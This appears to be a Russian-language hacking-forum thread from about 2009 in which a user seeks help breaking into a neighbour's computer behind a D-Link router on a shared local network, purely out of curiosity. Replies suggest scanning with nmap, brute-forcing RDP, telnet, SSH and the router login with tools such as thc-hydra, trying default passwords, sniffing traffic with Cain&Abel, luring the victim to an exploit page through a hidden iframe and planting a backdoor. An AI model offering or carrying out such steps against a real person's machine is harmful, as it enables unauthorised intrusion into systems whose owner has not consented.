как Обойти Роутер ?
 

Такая проблема :
...стоит у нас на районе локальная сеть на свичах , но один комп подключен к сети через Роутер .... в общем как обойти роутер , и вообще как такой комп взломать ? Спасибо за любую информацию по ТЕМЕ !

P.S.
RadMin не предлагать так как за компом редко кто сидит и ничего и не от кого не принимает (ПАРАНОИК Наверное) =)

роутер - на сколько я знаю это когда все порты закрыты кроме тех что указаны в настройках модема.. проскань его каким ни будь сканером на открытые порты а потом уже думать будем..

так вот тут и проблема ... сканировал его XSpiderom7 ... ничего не нашел - вообще ! К нему даже пинг не проходит , хотя он в чяте присутствует .... иногда даже общается !
В Nmap - Zenmap GUI подскажите подходящий набор ключей для такого скана , или другой подходящий сканер !
==========================
Быстрой трассировкой нарыл :
в PORT STATE SERVICE

22/tcp filtered ssh

23/tcp filtered telnet

25/tcp filtered smtp

80/tcp filtered http

3389/tcp filtered ms-term-serv

как я понял тут все фильтруетсо ..... Идеи есть ?

хмм. роутер похду на freebsd крутится, и адин не лошара .
мне кажется тупо нарыватся на него - не стоит. надо найти другие методы. например сканировать обшая сеть, искать хосты, которые исключены от ошбего правила на роутере, и уже копать на этом направлением.

Там винда ХР - ето гарант ! Он иногда играет с нами в КС или в ВрКрайт )))
Нащет исключенных хостов - как узнать какие исключены в правилах ???

наивный ты, чувак :)
роутер - это не игровая станция, ибо админ - идиот. и как я понял из скана - админ НЕ идиот, по этому ротер, который режет и фильтрирует все, это отдельное устройство. если он раздает инет или какой-то сервер там серьезный, то вероятно стоит нормлаьные сетевые обарудование. лично у меня дома, до моего компа, на котором стоит WIND XP (просто я не играю в игрушки) стоит роутер DSL, который может филтровывать трафик, не отвечать на пинги и т.д. так что это нормальное явление.

а насчет исключаюших правил - надо подробно изучать топологию вашего сети, кто что раздает, что где находится ! да и в чем заключается взлом именно этго роутера? что это вам даст? что вам нужен?
показать какой ты крутой? или испытывать моги античата? :)))

1-е: Что есть "моги" ? мб "мозги" )
2-е: Взломать нужно комп что стоит за етим роутером !
3-е: Взлом сам ради интереса , просто что то захотелось попробовать !

Так что будут какие то идеи и советы ? =) Может чтиво есть какое !

взлом за интерес ! приколько...
а ты знаешь что такое игра на интерес ? :)
- выложи полный лог из сканера Xpider 7.
- какой уровень знание у этого типа? троянить не вариант?
- его видно в сетевом окружение (если у вас говоришь локальная сеть). у него есть расшаренные папки?
- поставь у себя прога IP SCOPE и выбей его адрес (локальный, из твоей подсети) и смотрив открытые ресурсы

да много способов собрать информацию.. а потом уже можно будет искать уязвимости к этим направлениям !

P.S. чувак, а вообше-то не советовал плюнуть в колодец. это тебе, на будущее...

немучийся проверь на стандартный пароль маршрутизатор если неполучится забей
даже если у него стоит бажная ХП тебе от этого ничег онебудет,т.к. порты видно непроброшены с "железки" и значит все что ты бдуешь делать - это портить сеть канал)

попробуй сбрутить. можно много чего сотворить, имея РДП (:

замани его на страницу со сплоитом, залей ему клиентскую часть бекдора или чегото подобного, у себя поставь серверную ну ты меня понял

2 Pernat1y :
Чем ето можно сбрутить ? Подскажи софтину !

2 plas :
Подскажи где можно залить список етих стандартных паролей к роутеру - если такие есть !? =)

2 B1t.exe
XSpider 7.7 лог на "Стандартном" скане :
Хост
192.168.163.45
Информация

При сканировании данного хоста открытых портов не обнаружено.

Время отклика: хост не отвечает на запросы

Параметры сканирования

Начало сканирования: 12:56:14 04.03.2009

Время сканирования: 00:07:20

Версия: 7.7 Demo Build 3100

Профиль: DefaultOff.prf
=========
LanScope ево не находит ! Пинг ево не пробивает !
=========

043nKRuT0y узнай модель роутера сначала.
проскань нмапом роутер
nmap -PN -sV -O 123.123.123.123
и покажи что вывелось

http://www.google.com/search?q=rdp+bruteforce
зы. thc-hydra вроде умела
зыы. для начала просто попробуй Администратор/Administrator без пароля. бывает )

например http://virus.org/default-password

2 SVAROG

Вот кажись НМап нарыл модель роутера )
Starting Nmap 4.76 ( http://nmap.org ) at 2009-03-05 14:38 Московское время (зима)

All 1000 scanned ports on 192.168.163.45 are filtered

MAC Address: 00:19:5B:E2:AD:39 (D-Link)

Too many fingerprints match this host to give specific OS details

Network Distance: 1 hop

================
и еще :
где можно примеры страниц со сплоитом взять ! Я етим еще не стыкалса на практике - только чтиво (
================
Может ево трафик поснифать ? Подскажите что именно в Cain&Abel нужно настроить ?
================
Насчет сети :
Етот чел ничего не раздает , он даже не админ - сидит себе целый день в Старку по нету рубит !
В сети есть 4ри диапазона
192.168.163.ххх
192.168.160.ххх
192.168.7.ххх
192.168.161.ххх
и-нет раздается из 192.168.163.1 для 192.168.163.ххх
ну и соответственно остальным также !
есть адреса ДНС сервера и Альтернативного ДНС сервера ! Все адреса указываются пользователям каждому отдельно ! Ну и стоит клиент - серверный чат на 192.168.7.4 !
Стоит также файлообменный сервер с фильмами и прочей лабудой !
Кстати на тачке с Чатом стоит мой Радмин )

На файлообменнике стоит UNIX система с ftp 21 порту !
пробовал туда конекитса - запрашивает логин и пароль !
На 445 порту есть удаленное управление реестром !\

Мб ето как то поможет в чем то ?!
====================
Какие мысли будут ? =)

очень даже интересный порт, если он под WINDOWS XP.
есть один замечательный человек - stopxaker, глянь в статью: http://forum.antichat.ru/threadnav99665-1-10.html
-------------

ищи здесь: http://milw0rm.org/

страница со сплоитом это тоже самое, что любая страница на которой размещен нефидимый фрейм, например
<iframe src="http://domain.com/sploit/" width="1" height="1" style="visibility:hidden">
где
http://domain.com/sploit/
это путь до связки сплоитов, а их огромное множество
но это вариант далеко не эффективный, если учитывать что пробив по новым версиям лисы и оперы не больше 1%

пилять. а через веб интерфейс подключится ты пробывал?
Может на маршрутезаторе (роутере) паса ваще нету

А что ему это даст? ну подберет он пасс, залезет на роутер, ну собьет он там все настройки... Ему ж на комп надо! Или Я чего-то не вкуриваю?

2 gold-goblin : Ану ко про веб интерфейс поподробней =) Вот если на роутер попасть и настройки сбить так может удастся XSpider-om порты просканить на дыры !!!

2 vp$ : Посоветуй какие то связки может он браузер не патчит , или вообще сидит на ИЕ =)

В принципе да ! попробуй зайти на веб морду роутера и узнать пароль админа ... брутом скажем ... далее незаметно открывешь портики на заведомо знающие уязвимости ... желательно последние Метасплоит 3.2 и всё далее дело фантазии !

З.Ы. Что то мне кажется там апаратный фаервол стоит типа d-link DFL-800 уж очень похож по твоим рассказам ....

[QUOTE=gri.n] и узнать пароль админа ... брутом скажем ...
схожая у меня задачы:
Подскажите, брутер для простых роутеров(Dlink)
IP - известен
Login - известен (стандартный для Dlink - admin)
Password - известно кол-во символов
Сложность пароля - известно (3 буквы и 3 цифры без спец. символов)

осталось только программу найти для брута.

P.S. хеш можно backup вытащить, кто знает, подсажите.
Спасибо

[QUOTE=enures]http://www.securitylab.ru/software/234197.php

еще такой вопрос - как можно узнать на каком адресе висит интерфейс роутера ??? Походу адресок можно поменять со стандартного на любой другой .....

эм немного непонятен вопрос )))))) может переформулируеш?

ну вот роутер управляется с веб интерфейса ..... роутер имеет свой айпи , етот айпи и надо узнать , у меня имеется только МАС - роутера , хотелось бы узнать как узнать айпи роутера чтобы попробовать сбрутить доступ на железяку !

итак
1. Если открыт 3389 порт (рдп) надо брутить его.
2. Открыт 80 порт (http) надо пробывать попасть на веб морду
3. Телнет и ssh можно побрутить гидрой
4. Если есть мак комутера, то посмотреть его ип мона заюзав rarp.
5. Никакого удаленного управления реестром как и самого реестра на unix машинах нету.
6. Открывать порты для уязвимостей из метасплоита - ололо акститесь
7. Не забываем про такой великолепный протокол как snmp и стандартные комьюнити

хотелось бы тогда знать откуда ты взял мак роутера?

[QUOTE=echobyte]Спасибо, с программой Access Diver ознакомился. В ней нет атаки по маске, буду искать такие проги. Может у кого есть такие, подскажите?

Висит телнет и ссш - нах? Все просто, телнет забыл отключить.
filtered, я так понимаю, значит то что по этим портам могут постучаться машинки только с определенных ip(MAC, как вариант). Можешь попробовать натравить Cain на его ip и ждать, авось чего и словишь. Если вдруг к нему кто-нибудь постучится, можешь попробовать подменить свой идентификатор и повторить его действия, хотя я оч. сомневаюсь.

Если вдруг получишь доступ к роутеру, то дальше уже можно пофантизировать на тему.

Сканировать его машинку - практически бесполезно, сейчас не 2k3 год.

Как узнать если морда перевешена на др. порт? просканировать все порты и заглянуть везде, где светится http сервер.

попробуй проскань на открытые порты .. может что нить нароешь ...